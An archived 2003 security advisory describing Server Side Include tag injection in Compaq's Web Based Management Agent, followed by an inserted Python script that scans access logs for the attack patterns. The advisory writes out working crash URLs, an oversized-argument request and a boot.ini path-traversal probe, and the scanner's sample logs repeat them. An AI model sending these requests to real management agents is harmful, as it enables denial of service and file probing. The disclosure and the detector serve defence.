
SSI vulnerability in Compaq Web Based Management Agent

From: Ian Vitek <ian.vitek(at)as5-5-7.bi.s.bonet.se>
Date: Wed Jun 18 2003 - 18:05:14 EDT


SSI vulnerability in Compaq Web Based Management Agent


Type of vulnerabilities:
  Server Side Include injection. Exploitable.
  Stack overflows and access violations. Exploitable?
  Creation of script objects. Exploitable?

Affected Software: Compaq Web Based Management Agent
Verified Platforms: Windows

Background and problem description



Bashis (bash at wcd.se) has found several vulnerabilities in Compaq Web Based Management Agent. This Agent runs on TCP port 2301 (HTTP) or 2381 (HTTPS).
The agent uses "tags" to run functions at the server side. To list all tags:
http://IP:2301/<!.TableDisplayTags>

To crash the agent:
http://IP:2301/<!>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
http://IP:2301/survey/<!>
Stack overflow (0xc00000fd), Address: 0x10039869

This crashes the agent too:
http://IP:2301/<!.StringRedirecturl>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
http://IP:2301/<!.StringHttpRequest=Url>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
http://IP:2301/survey/<!.StringHttpRequest=Url>
Stack overflow (0xc00000fd), Address: 0x10039869

The cause could be an endless loop (the result contains a tag to display a URL, and the result contains a tag to display a URL, and the result...)

More strange stack overflows:
http://IP:2301/<!.ObjectIsapiECB>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc


Many tags take input that seems vulnerable:
http://IP:2301/<!.StringIsapiECB=lpszPathInfo>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc

Netcat the following:
GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0
Access violation (0xc0000005), Address: 0x100368a5

Check file existence (with a nice 'input box'):
http://IP:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini

It looks like you could create script objects. Check the tags with <!.TableDisplayTags>. Some of the CreateObject tags have the parameter 'script'. I don't know if it could be done though.

Is this just another remote DoS?
Are the Stack overflows and access violations exploitable? Can you create script objects and run them?

I have mailed HP (security-alert@hp.com) and got an automated response 28/5 2003.

If someone wants to forward this mail they may do so. (bugtraq? vulnwatch?)

To all of my friends; See you in Vegas!
The Swedes are coming.
//Ian Vitek

Received on Mon Jun 23 11:36:26 2003
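The advisory above does not include any detection guidance; the following is an added example (not part of the original post, and not vendor code) showing how a defender could scan web-server or proxy access logs for the tag-injection pattern it describes. The `<!.TagName=argument>` syntax, the two "recursive" tag names and the ~250-byte argument threshold are taken from the URLs in the post; the combined-log line format and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Combined access-log format (assumed): src ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Agent tag syntax as it appears in the advisory: <!>, <!.Name> or <!.Name=argument>
TAG_RE = re.compile(r'<!(?:\.(?P<name>[A-Za-z]+))?(?:=(?P<arg>[^>]*))?>')

# Tags the advisory reports as crashing the agent (suspected self-referential loop)
RECURSIVE_TAGS = {"StringHttpRequest", "StringRedirecturl"}
# Directory-traversal sequence after URL decoding
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')
# Advisory: ~250 bytes to FunctionContentType caused an access violation; flag anything near that
LONG_ARG = 200

# Constructed sample log lines (hypothetical sources and timestamps), not real traffic
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jun/2003:18:05:14 -0400] "GET /index.htm HTTP/1.0" 200 1432',
    '10.0.0.7 - - [18/Jun/2003:18:06:02 -0400] "GET /<!.TableDisplayTags> HTTP/1.0" 200 8801',
    '10.0.0.7 - - [18/Jun/2003:18:06:30 -0400] "GET /%3C%21.StringHttpRequest%3DUrl%3E HTTP/1.0" 500 0',
    '10.0.0.9 - - [18/Jun/2003:18:07:11 -0400] '
    '"GET /<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.0" 200 512',
    '10.0.0.7 - - [18/Jun/2003:18:08:00 -0400] "GET /<!.FunctionContentType='
    + "A" * 250 + '> HTTP/1.0" 500 0',
]


def parse_line(line):
    """Parse one access-log line; return a dict with the URL-decoded target, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote(rec["target"])  # catch %3C%21 as well as literal <!
    return rec


def classify(rec):
    """Return a list of (category, detail) findings for one parsed request."""
    findings = []
    target = rec["decoded"]
    if "<!" in target:
        findings.append(("ssi_tag_in_url", target))
    for t in TAG_RE.finditer(target):
        name = t.group("name") or ""
        arg = t.group("arg") or ""
        if name in RECURSIVE_TAGS:
            findings.append(("recursive_tag", name))
        if len(arg) >= LONG_ARG:
            findings.append(("oversized_tag_argument", f"{name}:{len(arg)}"))
    path, _, query = target.partition("?")
    if TRAVERSAL_RE.search(query) or TRAVERSAL_RE.search(path):
        findings.append(("path_traversal", query or path))
    return findings


def scan(lines):
    """Scan an iterable of log lines and return one alert dict per finding."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skip rather than crash the scanner
        for category, detail in classify(rec):
            alerts.append({"src": rec["src"], "category": category,
                           "detail": detail, "status": rec["status"]})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f'{a["src"]:<10} {a["category"]:<24} status={a["status"]} {a["detail"][:60]}')
```

Decoding the target before matching matters: the `%3C%21` form in the third sample line is the same `<!` tag once the agent's URL parser has processed it, so a rule that only looks for the literal characters misses it. In practice the source addresses hitting ports 2301/2381 with any of these categories are what an analyst would pivot on, and a reverse proxy or host firewall restricting those ports to management networks removes most of the exposure while waiting for a vendor fix.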


This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:40 EDT

